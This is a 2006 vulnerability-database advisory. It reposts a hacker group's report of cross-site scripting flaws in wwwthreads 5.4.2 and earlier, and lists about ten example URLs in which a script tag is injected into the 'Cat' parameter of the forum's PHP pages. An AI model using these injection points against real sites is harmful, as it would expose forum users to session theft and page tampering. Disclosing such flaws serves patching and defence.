wwwthreads <= 5.4.2 croos site script vulnerbilities

2006-09-26T00:00:00
ID SECURITYVULNS:DOC:14416
Type securityvulns
Reporter Securityvulns
Modified 2006-09-26T00:00:00

Description


PerSiaNFoX DigitaL SecuritY TeaM
*************

<# wwwthreads <= 5.4.2 Cross Site Script Vulnerabilities

<# Script.............. : wwwthreads <# Discovered By.... : Root3r_H3ll
<# Location .......... : Iran <# Class.............. : XSS <# Original Advisory : http://Www.PersainFox.com <# We ArE : Root3r_H3LL , Arash.RJ <#Spical TNX HB Team , All My Freinds


Exploits :

Www.site.coM/[path]/dosearch.php?Cat=<script> Www.site.coM/[path]/postlist.php?Cat=<script> Www.site.coM/[path]/showmembers.php?Cat=<script> Www.Site.coM/[path]/faq_english.php?Cat=<script> Www.Site.coM/[path]/online.php?Cat=<script> Www.Site.coM/[path]/login.php?Cat=<script> Www.Site.coM/[path]/newuser.php?Cat=<script> Www.Site.coM/[path]/wwwthreads.php?Cat=<script> Www.Site.coM/[path]/search.php?Cat=<script> Www.Site.coM/[path]/postlist.php?Cat=<script>